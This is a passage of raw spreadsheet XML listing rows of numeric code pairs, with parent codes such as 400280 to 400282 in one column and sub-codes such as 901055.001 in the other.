        <v>901134.00100000005</v>
      </c>
    </row>
    <row r="1111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1111" s="6">
        <v>400280</v>
      </c>
      <c r="B1111" s="3">
        <v>901134.00199999998</v>
      </c>
    </row>
    <row r="1112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1112" s="6">
        <v>400280</v>
      </c>
      <c r="B1112" s="3">
        <v>901134.00300000003</v>
      </c>
    </row>
    <row r="1113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1113" s="6">
        <v>400280</v>
      </c>
      <c r="B1113" s="3">
        <v>901134.00399999996</v>
      </c>
    </row>
    <row r="1114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1114" s="6">
        <v>400280</v>
      </c>
      <c r="B1114" s="3">
        <v>901134.005</v>
      </c>
    </row>
    <row r="1115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1115" s="6">
        <v>400280</v>
      </c>
      <c r="B1115" s="3">
        <v>901010</v>
      </c>
    </row>
    <row r="1116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1116" s="6">
        <v>400280</v>
      </c>
      <c r="B1116" s="3">
        <v>901123</v>
      </c>
    </row>
    <row r="1117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1117" s="6">
        <v>400280</v>
      </c>
      <c r="B1117" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="1118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1118" s="6">
        <v>400280</v>
      </c>
      <c r="B1118" s="3">
        <v>901547.01</v>
      </c>
    </row>
    <row r="1119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1119" s="6">
        <v>400280</v>
      </c>
      <c r="B1119" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="1120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1120" s="6">
        <v>400280</v>
      </c>
      <c r="B1120" s="3">
        <v>901115</v>
      </c>
    </row>
    <row r="1121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1121" s="6">
        <v>400280</v>
      </c>
      <c r="B1121" s="3">
        <v>901059.00199999998</v>
      </c>
    </row>
    <row r="1122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1122" s="6">
        <v>400280</v>
      </c>
      <c r="B1122" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="1123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1123" s="6">
        <v>400280</v>
      </c>
      <c r="B1123" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1124" s="6">
        <v>400280</v>
      </c>
      <c r="B1124" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1125" s="6">
        <v>400280</v>
      </c>
      <c r="B1125" s="3">
        <v>901555.00100000005</v>
      </c>
    </row>
    <row r="1126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1126" s="6">
        <v>400280</v>
      </c>
      <c r="B1126" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1127" s="6">
        <v>400280</v>
      </c>
      <c r="B1127" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="1128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1128" s="6">
        <v>400280</v>
      </c>
      <c r="B1128" s="3">
        <v>901555.005</v>
      </c>
    </row>
    <row r="1129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1129" s="6">
        <v>400280</v>
      </c>
      <c r="B1129" s="3">
        <v>901565</v>
      </c>
    </row>
    <row r="1130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1130" s="6">
        <v>400280</v>
      </c>
      <c r="B1130" s="3">
        <v>901565.00199999998</v>
      </c>
    </row>
    <row r="1131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1131" s="6">
        <v>400280</v>
      </c>
      <c r="B1131" s="3">
        <v>901565.00300000003</v>
      </c>
    </row>
    <row r="1132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1132" s="6">
        <v>400280</v>
      </c>
      <c r="B1132" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="1133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1133" s="6">
        <v>400280</v>
      </c>
      <c r="B1133" s="3">
        <v>901611</v>
      </c>
    </row>
    <row r="1134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1134" s="6">
        <v>400280</v>
      </c>
      <c r="B1134" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1135" s="6">
        <v>400280</v>
      </c>
      <c r="B1135" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1136" s="6">
        <v>400280</v>
      </c>
      <c r="B1136" s="3">
        <v>901564.00399999996</v>
      </c>
    </row>
    <row r="1137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1137" s="6">
        <v>400280</v>
      </c>
      <c r="B1137" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="1138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1138" s="6">
        <v>400280</v>
      </c>
      <c r="B1138" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="1139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1139" s="6">
        <v>400280</v>
      </c>
      <c r="B1139" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="1140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1140" s="6">
        <v>400280</v>
      </c>
      <c r="B1140" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1141" s="6">
        <v>400280</v>
      </c>
      <c r="B1141" s="3">
        <v>901056.00399999996</v>
      </c>
    </row>
    <row r="1142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1142" s="6">
        <v>400280</v>
      </c>
      <c r="B1142" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="1143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1143" s="6">
        <v>400280</v>
      </c>
      <c r="B1143" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="1144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1144" s="6">
        <v>400280</v>
      </c>
      <c r="B1144" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1145" s="6">
        <v>400280</v>
      </c>
      <c r="B1145" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="1146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1146" s="6">
        <v>400280</v>
      </c>
      <c r="B1146" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="1147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1147" s="6">
        <v>400280</v>
      </c>
      <c r="B1147" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="1148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1148" s="6">
        <v>400280</v>
      </c>
      <c r="B1148" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1149" s="6">
        <v>400280</v>
      </c>
      <c r="B1149" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="1150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1150" s="6">
        <v>400280</v>
      </c>
      <c r="B1150" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="1151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1151" s="6">
        <v>400280</v>
      </c>
      <c r="B1151" s="3">
        <v>901542.00199999998</v>
      </c>
    </row>
    <row r="1152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1152" s="6">
        <v>400280</v>
      </c>
      <c r="B1152" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1153" s="6">
        <v>400280</v>
      </c>
      <c r="B1153" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1154" s="6">
        <v>400280</v>
      </c>
      <c r="B1154" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="1155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1155" s="6">
        <v>400280</v>
      </c>
      <c r="B1155" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="1156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1156" s="6">
        <v>400280</v>
      </c>
      <c r="B1156" s="3">
        <v>901055.00300000003</v>
      </c>
    </row>
    <row r="1157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1157" s="6">
        <v>400280</v>
      </c>
      <c r="B1157" s="3">
        <v>901055.00399999996</v>
      </c>
    </row>
    <row r="1158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1158" s="6">
        <v>400280</v>
      </c>
      <c r="B1158" s="3">
        <v>901055.005</v>
      </c>
    </row>
    <row r="1159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1159" s="6">
        <v>400280</v>
      </c>
      <c r="B1159" s="3">
        <v>901055.00800000003</v>
      </c>
    </row>
    <row r="1160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1160" s="6">
        <v>400280</v>
      </c>
      <c r="B1160" s="3">
        <v>901055.01100000006</v>
      </c>
    </row>
    <row r="1161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1161" s="6">
        <v>400280</v>
      </c>
      <c r="B1161" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="1162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1162" s="6">
        <v>400280</v>
      </c>
      <c r="B1162" s="3">
        <v>901055.01300000004</v>
      </c>
    </row>
    <row r="1163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1163" s="6">
        <v>400280</v>
      </c>
      <c r="B1163" s="3">
        <v>901055.01399999997</v>
      </c>
    </row>
    <row r="1164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1164" s="6">
        <v>400280</v>
      </c>
      <c r="B1164" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1165" s="6">
        <v>400280</v>
      </c>
      <c r="B1165" s="3">
        <v>901620</v>
      </c>
    </row>
    <row r="1166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1166" s="6">
        <v>400280</v>
      </c>
      <c r="B1166" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1167" s="6">
        <v>400280</v>
      </c>
      <c r="B1167" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1168" s="6">
        <v>400280</v>
      </c>
      <c r="B1168" s="3">
        <v>901129</v>
      </c>
    </row>
    <row r="1169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1169" s="6">
        <v>400280</v>
      </c>
      <c r="B1169" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="1170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1170" s="6">
        <v>400280</v>
      </c>
      <c r="B1170" s="3">
        <v>901218.00199999998</v>
      </c>
    </row>
    <row r="1171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1171" s="6">
        <v>400280</v>
      </c>
      <c r="B1171" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="1172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1172" s="6">
        <v>400280</v>
      </c>
      <c r="B1172" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1173" s="6">
        <v>400280</v>
      </c>
      <c r="B1173" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1174" s="6">
        <v>400280</v>
      </c>
      <c r="B1174" s="3">
        <v>901614</v>
      </c>
    </row>
    <row r="1175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1175" s="6">
        <v>400280</v>
      </c>
      <c r="B1175" s="3">
        <v>901614.00100000005</v>
      </c>
    </row>
    <row r="1176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1176" s="6">
        <v>400280</v>
      </c>
      <c r="B1176" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1177" s="6">
        <v>400280</v>
      </c>
      <c r="B1177" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1178" s="6">
        <v>400280</v>
      </c>
      <c r="B1178" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="1179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1179" s="6">
        <v>400280</v>
      </c>
      <c r="B1179" s="3">
        <v>901111</v>
      </c>
    </row>
    <row r="1180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1180" s="6">
        <v>400280</v>
      </c>
      <c r="B1180" s="3">
        <v>901125</v>
      </c>
    </row>
    <row r="1181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1181" s="6">
        <v>400280</v>
      </c>
      <c r="B1181" s="3">
        <v>901497</v>
      </c>
    </row>
    <row r="1182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1182" s="6">
        <v>400280</v>
      </c>
      <c r="B1182" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="1183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1183" s="6">
        <v>400280</v>
      </c>
      <c r="B1183" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="1184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1184" s="6">
        <v>400280</v>
      </c>
      <c r="B1184" s="3">
        <v>901497.00300000003</v>
      </c>
    </row>
    <row r="1185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1185" s="6">
        <v>400281</v>
      </c>
      <c r="B1185" s="3">
        <v>901185</v>
      </c>
    </row>
    <row r="1186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1186" s="6">
        <v>400281</v>
      </c>
      <c r="B1186" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1187" s="6">
        <v>400281</v>
      </c>
      <c r="B1187" s="3">
        <v>901555.00199999998</v>
      </c>
    </row>
    <row r="1188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1188" s="6">
        <v>400281</v>
      </c>
      <c r="B1188" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1189" s="6">
        <v>400281</v>
      </c>
      <c r="B1189" s="3">
        <v>901555.005</v>
      </c>
    </row>
    <row r="1190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1190" s="6">
        <v>400281</v>
      </c>
      <c r="B1190" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="1191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1191" s="6">
        <v>400281</v>
      </c>
      <c r="B1191" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="1192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1192" s="6">
        <v>400281</v>
      </c>
      <c r="B1192" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="1193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1193" s="6">
        <v>400281</v>
      </c>
      <c r="B1193" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1194" s="6">
        <v>400281</v>
      </c>
      <c r="B1194" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1195" s="6">
        <v>400281</v>
      </c>
      <c r="B1195" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="1196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1196" s="6">
        <v>400281</v>
      </c>
      <c r="B1196" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="1197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1197" s="6">
        <v>400281</v>
      </c>
      <c r="B1197" s="3">
        <v>901055.00300000003</v>
      </c>
    </row>
    <row r="1198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1198" s="6">
        <v>400281</v>
      </c>
      <c r="B1198" s="3">
        <v>901055.00399999996</v>
      </c>
    </row>
    <row r="1199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1199" s="6">
        <v>400281</v>
      </c>
      <c r="B1199" s="3">
        <v>901055.005</v>
      </c>
    </row>
    <row r="1200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1200" s="6">
        <v>400281</v>
      </c>
      <c r="B1200" s="3">
        <v>901055.00800000003</v>
      </c>
    </row>
    <row r="1201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1201" s="6">
        <v>400281</v>
      </c>
      <c r="B1201" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="1202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1202" s="6">
        <v>400281</v>
      </c>
      <c r="B1202" s="3">
        <v>901539</v>
      </c>
    </row>
    <row r="1203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1203" s="6">
        <v>400282</v>
      </c>
      <c r="B1203" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="1204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1204" s="6">
        <v>400282</v>
      </c>
      <c r="B1204" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="1205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1205" s="6">
        <v>400282</v>
      </c>
      <c r="B1205" s="3">
        <v>901548.00300000003</v>
      </c>
    </row>
    <row r="1206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1206" s="6">
        <v>400282</v>
      </c>
      <c r="B1206" s="3">
        <v>901548.00399999996</v>
      </c>
    </row>
    <row r="1207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1207" s="6">
        <v>400282</v>
      </c>
      <c r="B1207" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="1208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1208" s="6">
        <v>400282</v>
      </c>
      <c r="B1208" s="3">
        <v>901134.00399999996</v>
      </c>
    </row>
    <row r="1209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1209" s="6">
        <v>400282</v>
      </c>
      <c r="B1209" s="3">
        <v>901087</v>
      </c>
    </row>
    <row r="1210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1210" s="6">
        <v>400282</v>
      </c>
      <c r="B1210" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="1211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1211" s="6">
        <v>400282</v>
      </c>
      <c r="B1211" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1212" s="6">
        <v>400282</v>
      </c>
      <c r="B1212" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="1213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1213" s="6">
        <v>400282</v>
      </c>
      <c r="B1213" s="3">
        <v>901098.00399999996</v>
      </c>
    </row>
    <row r="1214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1214" s="6">
        <v>400282</v>
      </c>
      <c r="B1214" s="3">
        <v>901010</v>
      </c>
    </row>
    <row r="1215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1215" s="6">
        <v>400282</v>
      </c>
      <c r="B1215" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1216" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1216" s="6">
        <v>400282</v>
      </c>
      <c r="B1216" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1217" s="6">
        <v>400282</v>
      </c>
      <c r="B1217" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="1218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1218" s="6">
        <v>400282</v>
      </c>
      <c r="B1218" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="1219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1219" s="6">
        <v>400282</v>
      </c>
      <c r="B1219" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1220" s="6">
        <v>400282</v>
      </c>
      <c r="B1220" s="3">
        <v>901547.00300000003</v>
      </c>
    </row>
    <row r="1221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1221" s="6">
        <v>400282</v>
      </c>
      <c r="B1221" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="1222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1222" s="6">
        <v>400282</v>
      </c>
      <c r="B1222" s="3">
        <v>901547.01100000006</v>
      </c>
    </row>
    <row r="1223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1223" s="6">
        <v>400282</v>
      </c>
      <c r="B1223" s="3">
        <v>901547.01300000004</v>
      </c>
    </row>
    <row r="1224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1224" s="6">
        <v>400282</v>
      </c>
      <c r="B1224" s="3">
        <v>901547.01399999997</v>
      </c>
    </row>
    <row r="1225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1225" s="6">
        <v>400282</v>
      </c>
      <c r="B1225" s="3">
        <v>901547.01500000001</v>
      </c>
    </row>
    <row r="1226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1226" s="6">
        <v>400282</v>
      </c>
      <c r="B1226" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="1227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1227" s="6">
        <v>400282</v>
      </c>
      <c r="B1227" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="1228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1228" s="6">
        <v>400282</v>
      </c>
      <c r="B1228" s="3">
        <v>901037.00199999998</v>
      </c>
    </row>
    <row r="1229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1229" s="6">
        <v>400282</v>
      </c>
      <c r="B1229" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="1230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1230" s="6">
        <v>400282</v>
      </c>
      <c r="B1230" s="3">
        <v>901037.00399999996</v>
      </c>
    </row>
    <row r="1231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1231" s="6">
        <v>400282</v>
      </c>
      <c r="B1231" s="3">
        <v>901037.005</v>
      </c>
    </row>
    <row r="1232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1232" s="6">
        <v>400282</v>
      </c>
      <c r="B1232" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="1233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1233" s="6">
        <v>400282</v>
      </c>
      <c r="B1233" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="1234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1234" s="6">
        <v>400282</v>
      </c>
      <c r="B1234" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="1235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1235" s="6">
        <v>400282</v>
      </c>
      <c r="B1235" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1236" s="6">
        <v>400282</v>
      </c>
      <c r="B1236" s="3">
        <v>901059.00199999998</v>
      </c>
    </row>
    <row r="1237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1237" s="6">
        <v>400282</v>
      </c>
      <c r="B1237" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1238" s="6">
        <v>400282</v>
      </c>
      <c r="B1238" s="3">
        <v>901059.00399999996</v>
      </c>
    </row>
    <row r="1239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1239" s="6">
        <v>400282</v>
      </c>
      <c r="B1239" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1240" s="6">
        <v>400282</v>
      </c>
      <c r="B1240" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="1241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1241" s="6">
        <v>400282</v>
      </c>
      <c r="B1241" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1242" s="6">
        <v>400282</v>
      </c>
      <c r="B1242" s="3">
        <v>901136</v>
      </c>
    </row>
    <row r="1243" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1243" s="6">
        <v>400282</v>
      </c>
      <c r="B1243" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="1244" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1244" s="6">
        <v>400282</v>
      </c>
      <c r="B1244" s="3">
        <v>901136.00199999998</v>
      </c>
    </row>
    <row r="1245" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1245" s="6">
        <v>400282</v>
      </c>
      <c r="B1245" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="1246" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1246" s="6">
        <v>400282</v>
      </c>
      <c r="B1246" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="1247" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1247" s="6">
        <v>400282</v>
      </c>
      <c r="B1247" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1248" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1248" s="6">
        <v>400282</v>
      </c>
      <c r="B1248" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="1249" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1249" s="6">
        <v>400282</v>
      </c>
      <c r="B1249" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1250" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1250" s="6">
        <v>400282</v>
      </c>
      <c r="B1250" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="1251" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1251" s="6">
        <v>400282</v>
      </c>
      <c r="B1251" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="1252" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1252" s="6">
        <v>400282</v>
      </c>
      <c r="B1252" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="1253" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1253" s="6">
        <v>400282</v>
      </c>
      <c r="B1253" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1254" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1254" s="6">
        <v>400282</v>
      </c>
      <c r="B1254" s="3">
        <v>901561</v>
      </c>
    </row>
    <row r="1255" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1255" s="6">
        <v>400282</v>
      </c>
      <c r="B1255" s="3">
        <v>901561.00100000005</v>
      </c>
    </row>
    <row r="1256" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1256" s="6">
        <v>400282</v>
      </c>
      <c r="B1256" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="1257" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1257" s="6">
        <v>400282</v>
      </c>
      <c r="B1257" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="1258" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1258" s="6">
        <v>400282</v>
      </c>
      <c r="B1258" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1259" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1259" s="6">
        <v>400282</v>
      </c>
      <c r="B1259" s="3">
        <v>901611</v>
      </c>
    </row>
    <row r="1260" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1260" s="6">
        <v>400282</v>
      </c>
      <c r="B1260" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="1261" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1261" s="6">
        <v>400282</v>
      </c>
      <c r="B1261" s="3">
        <v>901546.00100000005</v>
      </c>
    </row>
    <row r="1262" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1262" s="6">
        <v>400282</v>
      </c>
      <c r="B1262" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="1263" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1263" s="6">
        <v>400282</v>
      </c>
      <c r="B1263" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="1264" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1264" s="6">
        <v>400282</v>
      </c>
      <c r="B1264" s="3">
        <v>901546.00399999996</v>
      </c>
    </row>
    <row r="1265" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1265" s="6">
        <v>400282</v>
      </c>
      <c r="B1265" s="3">
